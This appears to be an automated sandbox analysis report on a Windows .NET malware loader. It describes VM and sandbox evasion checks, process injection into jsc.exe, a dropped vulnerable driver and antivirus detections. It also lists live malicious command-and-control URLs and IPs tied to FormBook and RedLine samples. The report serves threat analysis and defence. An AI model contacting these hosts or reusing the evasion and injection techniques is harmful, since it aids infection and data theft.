Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: file.exe PID: 6988, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: file.exe, 00000000.00000002.493841709.000001F6C76CC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: file.exe, 00000000.00000002.493841709.000001F6C76CC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\file.exe TID: 7068	Thread sleep time: -6456360425798339s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 4672	Thread sleep count: 9612 > 30			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep			graph_2-5847
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess			graph_2-6027

Source: C:\Users\user\Desktop\file.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\?????.sys

Jump to dropped file

Source: C:\Users\user\Desktop\file.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Window / User API: threadDelayed 9612

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe

Evaded block: after key decision

graph_2-5688

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe

API coverage: 4.4 %

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe

API call chain: ExitProcess graph end node

graph_2-6029

Source: jsc.exe, 00000002.00000002.492997621.0000000000E50000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: VMware
Source: file.exe, 00000000.00000002.493841709.000001F6C76CC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
Source: file.exe, 00000000.00000002.493841709.000001F6C76CC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: file.exe, 00000000.00000002.493841709.000001F6C76CC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: file.exe, 00000000.00000002.493841709.000001F6C76CC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
Source: file.exe, 00000000.00000002.493841709.000001F6C76CC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: jsc.exe, 00000002.00000002.492997621.0000000000E50000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: Chrome/HEADIsWow64Processkernel32X:\Windows\SysWOW64\ntdll.dllntdll.dllRtlInitUnicodeStringZwOpenFileZwCreateSectionZwMapViewOfSectionNtUnmapViewOfSectionNtQueryInformationProcess{%08X-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X}RtlRandomExntdll:y--\Driver\Device ParametersEDID(IsActive)(NotActive)BAD EDID!No EDID!--Nm:SYSTEM\ControlSet001\Enum\DISPLAY\\.\PhysicalDrive%d---VMwareVirtualBoxVBoxQEMUDisplay AdapterNon-PnPVMwareVirtualBoxVBoxQEMUWestern Disk HARDDISK(1):(2):text/*Mozilla / 5.0 (SymbianOS / 9.1; U; [en]; SymbianOS / 91 Series60 / 3.0) AppleWebkit / 413 (KHTML, like Gecko) Safari / 413
Source: file.exe, 00000000.00000002.493841709.000001F6C76CC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE
Source: file.exe, 00000000.00000002.493841709.000001F6C76CC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
Source: file.exe, 00000000.00000002.493841709.000001F6C76CC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: file.exe, 00000000.00000002.493841709.000001F6C76CC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: file.exe, 00000000.00000002.493841709.000001F6C76CC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: file.exe, 00000000.00000002.493841709.000001F6C76CC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: file.exe, 00000000.00000002.493218018.000001F6C5BD8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllQQ

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe

Code function: 2_2_00405700 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

2_2_00405700

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe

2_2_00402CB0

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe

Code function: 2_2_004039C0 GetStartupInfoA,GetProcessHeap,GetProcessHeap,HeapAlloc,_fast_error_exit,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,_fast_error_exit,_fast_error_exit,__RTC_Initialize,__amsg_exit,GetCommandLineA,___crtGetEnvironmentStringsA,__setargv,__amsg_exit,__setenvp,__amsg_exit,__cinit,__amsg_exit,__wincmdln,

2_2_004039C0

Source: C:\Users\user\Desktop\file.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe	Code function: 2_2_00407219 SetUnhandledExceptionFilter,	2_2_00407219
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe	Code function: 2_2_00405700 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00405700
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe	Code function: 2_2_0040C52A _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_0040C52A

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe base: 40D000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe base: 413000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe base: 416000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe base: 418000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe base: B12008	Jump to behavior

.NET source code references suspicious native API functions

Source: file.exe, ????????/???????????.cs

Reference to suspicious API methods: ('???????????', 'GetProcAddress@kernel32.dll'), ('????????', 'LoadLibrary@kernel32.dll'), ('?????????', 'VirtualProtect@kernel32.dll'), ('????????????', 'VirtualAlloc@kernel32.dll')

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\file.exe

Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe

2_2_00402050

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ComSvcConfig.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ComSvcConfig.exe			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe

Code function: GetLocaleInfoA,

2_2_0040B123

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe

Code function: 2_2_0040C66D cpuid

2_2_0040C66D

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe

Code function: 2_2_00407ACC GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

2_2_00407ACC

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe

2_2_004039C0

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
1 Valid Accounts	13 Native API	1 Valid Accounts	1 Valid Accounts	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	2 Windows Service	1 Exploitation for Privilege Escalation	1 Valid Accounts	LSASS Memory	121 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	1 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	2 LSASS Driver	11 Access Token Manipulation	1 Disable or Modify Tools	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	2 Windows Service	21 Virtualization/Sandbox Evasion	NTDS	21 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	Scheduled Transfer	1 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	211 Process Injection	11 Access Token Manipulation	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	2 LSASS Driver	211 Process Injection	Cached Domain Credentials	34 System Information Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Deobfuscate/Decode Files or Information	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 Obfuscated Files or Information	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
file.exe	46%	ReversingLabs	Win64.Trojan.Pwsx
file.exe	56%	Virustotal		Browse
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\?????.sys	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://www.sysinternals.comopen/?ICONSHELLRUNASAboutUsage/raw/netonlyRunAsInvoker__COMPAT_LAYERcmd	0%	URL Reputation	safe
https://www.sysinternals.com0	0%	URL Reputation	safe
http://5.42.94.169	0%	Avira URL Cloud	safe
http://5.42.94.169/customer/368	100%	Avira URL Cloud	malware
http://5.42.94.169	8%	Virustotal		Browse
http://5.42.94.169/customer/368	9%	Virustotal		Browse
http://109.206.241.33/files/Hadi.config.CfgEncFileMZ	0%	Virustotal		Browse
http://109.206.241.33/files/Hadi.config.CfgEncFileMZ	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://5.42.94.169/customer/368	true	9%, Virustotal, Browse Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.sysinternals.com	jsc.exe	false		high
http://www.sysinternals.comopen/?ICONSHELLRUNASAboutUsage/raw/netonlyRunAsInvoker__COMPAT_LAYERcmd	file.exe, 00000000.00000002.495389743.000001F6D7691000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.493841709.000001F6C77A3000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://109.206.241.33/files/Hadi.config.CfgEncFileMZ	jsc.exe, 00000002.00000002.492997621.0000000000E50000.00000040.00001000.00020000.00000000.sdmp, jsc.exe, 00000002.00000002.493023944.0000000000E66000.00000040.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://5.42.94.169	file.exe, 00000000.00000002.493841709.000001F6C7685000.00000004.00000800.00020000.00000000.sdmp	false	8%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	file.exe, 00000000.00000002.493841709.000001F6C7685000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.sysinternals.com0	file.exe, 00000000.00000002.493841709.000001F6C76CC000.00000004.00000800.00020000.00000000.sdmp, ?????.sys.0.dr	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
5.42.94.169	unknown	Russian Federation		39493	RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU	false

General Information

Joe Sandbox Version:	37.1.0 Beryl
Analysis ID:	882700
Start date and time:	2023-06-06 17:13:55 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 0s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	3
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	file.exe
Detection:	MAL
Classification:	mal100.troj.expl.evad.winEXE@5/2@0/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 28.5% (good quality ratio 26.2%) Quality average: 72.8% Quality standard deviation: 31.3%
HCA Information:	Successful, ratio: 76% Number of executed functions: 20 Number of non-executed functions: 30
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Report size getting too big, too many NtAllocateVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
17:14:52	API Interceptor	62x Sleep call for process: file.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
5.42.94.169	SecuriteInfo.com.Heur.20230606132832680639403.rtf	Get hash	malicious	FormBook	Browse	5.42.94.169/customer/575
	file.exe	Get hash	malicious	lgoogLoader	Browse	5.42.94.169/customer/367
	rSBH388HCS009577EISATBL2023000250.exe	Get hash	malicious	Unknown	Browse	5.42.94.169/customer/163
	SecuriteInfo.com.Win64.PWSX-gen.13965.6561.exe	Get hash	malicious	FormBook	Browse	5.42.94.169/customer/275
	file.exe	Get hash	malicious	Vidar	Browse	5.42.94.169/customer/174
	file.exe	Get hash	malicious	lgoogLoader	Browse	5.42.94.169/customer/107
	file.exe	Get hash	malicious	Unknown	Browse	5.42.94.169/customer/71
	CAPZcbB8DM.exe	Get hash	malicious	FormBook	Browse	5.42.94.169/customer/49
	rIMG-2023052224.exe	Get hash	malicious	FormBook	Browse	5.42.94.169/customer/14
	rMerchantReportBYDocDT.exe	Get hash	malicious	Unknown	Browse	5.42.94.169/customer/178
	qoqfBIFsEW.exe	Get hash	malicious	Unknown	Browse	5.42.94.169/customer/183
	kbjQlQEZ4E.exe	Get hash	malicious	Unknown	Browse	5.42.94.169/customer/184
	IMG-20230529-WA0004470000000400000000002023.exe	Get hash	malicious	FormBook	Browse	5.42.94.169/customer/156
	PURCHASE ORDER_PDF_______________________..exe	Get hash	malicious	FormBook	Browse	5.42.94.169/customer/185
	Zahlungsbeleg.exe	Get hash	malicious	FormBook	Browse	5.42.94.169/customer/177
	SecuriteInfo.com.Variant.Tedy.374033.1533.27865.exe	Get hash	malicious	RedLine	Browse	5.42.94.169/customer/115
	SecuriteInfo.com.MSIL.Agent.TXGD.tr.dldr.26263.6028.exe	Get hash	malicious	RedLine	Browse	5.42.94.169/customer/118
	rIMG-20230601-WA0004470000000400000000002023.exe	Get hash	malicious	FormBook	Browse	5.42.94.169/customer/105
	BbD734ZE76.exe	Get hash	malicious	lgoogLoader	Browse	5.42.94.169/customer/96
	zQkj8N8vpa.exe	Get hash	malicious	lgoogLoader	Browse	5.42.94.169/customer/95

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU	SecuriteInfo.com.Heur.20230606132832680639403.rtf	Get hash	malicious	FormBook	Browse	5.42.94.169
	s7yGw1M6VE.exe	Get hash	malicious	RedLine	Browse	45.15.157.14
	file.exe	Get hash	malicious	lgoogLoader	Browse	5.42.94.169
	file.exe	Get hash	malicious	MinerDownloader, RedLine, SystemBC, Vidar, Xmrig	Browse	5.42.95.122
	rSBH388HCS009577EISATBL2023000250.exe	Get hash	malicious	Unknown	Browse	5.42.94.169
	SecuriteInfo.com.Win64.PWSX-gen.13965.6561.exe	Get hash	malicious	FormBook	Browse	5.42.94.169
	file.exe	Get hash	malicious	Vidar	Browse	5.42.94.169
	6OYe8LzpcJ.exe	Get hash	malicious	Unknown	Browse	5.42.64.41
	file.exe	Get hash	malicious	lgoogLoader	Browse	5.42.94.169
	kZ1F8qth8R.elf	Get hash	malicious	Mirai	Browse	5.42.95.232
	wC9lxAF181.elf	Get hash	malicious	Mirai	Browse	5.42.95.232
	file.exe	Get hash	malicious	Unknown	Browse	5.42.94.169
	CAPZcbB8DM.exe	Get hash	malicious	FormBook	Browse	5.42.94.169
	rIMG-2023052224.exe	Get hash	malicious	FormBook	Browse	5.42.94.169
	rMerchantReportBYDocDT.exe	Get hash	malicious	Unknown	Browse	5.42.94.169
	qoqfBIFsEW.exe	Get hash	malicious	Unknown	Browse	5.42.94.169
	kbjQlQEZ4E.exe	Get hash	malicious	Unknown	Browse	5.42.94.169
	IMG-20230529-WA0004470000000400000000002023.exe	Get hash	malicious	FormBook	Browse	5.42.94.169
	PURCHASE ORDER_PDF_______________________..exe	Get hash	malicious	FormBook	Browse	5.42.94.169
	Zahlungsbeleg.exe	Get hash	malicious	FormBook	Browse	5.42.94.169

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\?????.sys	file.exe	Get hash	malicious	lgoogLoader	Browse
	file.exe	Get hash	malicious	lgoogLoader	Browse
	file.exe	Get hash	malicious	AsyncRAT, VenomRAT	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	lgoogLoader	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	RedLine	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	RedLine	Browse
	file.exe	Get hash	malicious	RedLine	Browse
	file.exe	Get hash	malicious	Cinoshi Stealer	Browse
	file.exe	Get hash	malicious	Snake Keylogger	Browse
	file.exe	Get hash	malicious	Snake Keylogger	Browse
	file.exe	Get hash	malicious	BitRAT	Browse
	file.exe	Get hash	malicious	RedLine	Browse
	file.exe	Get hash	malicious	RedLine	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	BitRAT	Browse
	file.exe	Get hash	malicious	lgoogLoader	Browse
	file.exe	Get hash	malicious	RedLine	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\file.exe.log

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1595
Entropy (8bit):	5.378294470225564
Encrypted:	false
SSDEEP:	48:MxHKn1qHGiD0HKeGiYHKGD8AoiHd+vxpNStHTG1hAHKKPz:iqnwmI0qerYqGgAoi0ZPStzG1eqKPz
MD5:	3D4F5C31B249A99B5AC79BB49D9894F3
SHA1:	C7F66B88EB5A896E235CB6C37CC752C225119173
SHA-256:	472C344E0D0AB687ED38440FCE12C0E010957CF27C4514710C0683F15DC0DEC5
SHA-512:	CF6805ACC8DAEBFB21DC467BF533D6D68BC9EF5BED519D1DF0833BFB5E982E54828702A672EBD971EFE4FC7B828818B8DB57FAC70B673AA5A884B5AB9130CA1E
Malicious:	true
Reputation:	low
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\6d7d43e19d7fc0006285b85b7e2c8702\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..2,"System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neut

C:\Users\user\AppData\Local\Temp\?????.sys

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (DLL) (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	36208
Entropy (8bit):	6.284053631838433
Encrypted:	false
SSDEEP:	768:tKCM0IWRhm8LiES4cT4iZ923OMqUD6Q4KICJw4:t7/Vhzb3pL4GJw4
MD5:	97E3A44EC4AE58C8CC38EEFC613E950E
SHA1:	BC47E15537FA7C32DFEFD23168D7E1741F8477ED
SHA-256:	440883CD9D6A76DB5E53517D0EC7FE13D5A50D2F6A7F91ECFC863BC3490E4F5C
SHA-512:	8EF7FC489B6FFED9EC14746E526AE87F44C39D5EAFFF0D4C3BFA0B3F0D28450F76D1066F446C766F4C9A20842A7F084FE4A9F94659D5487EA88959FCCB2A96EB
Malicious:	true
Yara Hits:	Rule: PUA_VULN_Driver_Sysinternalswwwsysinternalscom_procexpsys_ProcessExplorer_HoEP, Description: Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - 97e3a44ec4ae58c8cc38eefc613e950e.bin, Source: C:\Users\user\AppData\Local\Temp\?????.sys, Author: Florian Roth
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3...w.{.w.{.w.{.~...p.{.w.z.H.{.~...t.{.~...t.{.~...t.{."...v.{."..v.{.".y.v.{.Richw.{.........PE..d...l..a.........." .....L..........X.......................................................................................................x...(............`.......l..p!......0....I..T............................................@...............................text....%.......&.................. ..h.rdata.......@.......*..............@..H.data...,....P.......:..............@....pdata.......`.......<..............@..HPAGE.........p.......@.............. ..`INIT.................\.............. ..b.rsrc................f..............@..B.reloc..0............j..............@..B................................................................................................................................................................................................

Static File Info

General

File type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.697202938635302
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	30720
MD5:	daf761fb9aaa34a9c2120003694d88a3
SHA1:	47fd2695b6da26f6444799d442662b982d70f783
SHA256:	18d4850a10812f3b4d8631939d469b41c1d344a7fa9205acc31b265d0600291b
SHA512:	1ddf3c0b4dcbb4103d24b6a5bb3308dff706c9d9277d411be3f9356e9040e67b04c0c02c9c927ba60c5723a50d746287de34cff5545003a0aed3596ec13fd7b2
SSDEEP:	768:uwVMApolbUGPPMdwdunhdH15FIU/ogyejq:bVLoljn8nhj5FF1jq
TLSH:	68D20800A3F98767EAFB4BF64871124447BA7ABB7936E75D0DC460DB1A637404A01BA3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...Lx}d.........."...0.Uk............... ....@...... ....................................`................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x400000
Entrypoint Section:
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x647D784C [Mon Jun 5 05:53:16 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:

Entrypoint Preview

Instruction
dec ebp
pop edx
nop
add byte ptr [ebx], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xa000	0x8f4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
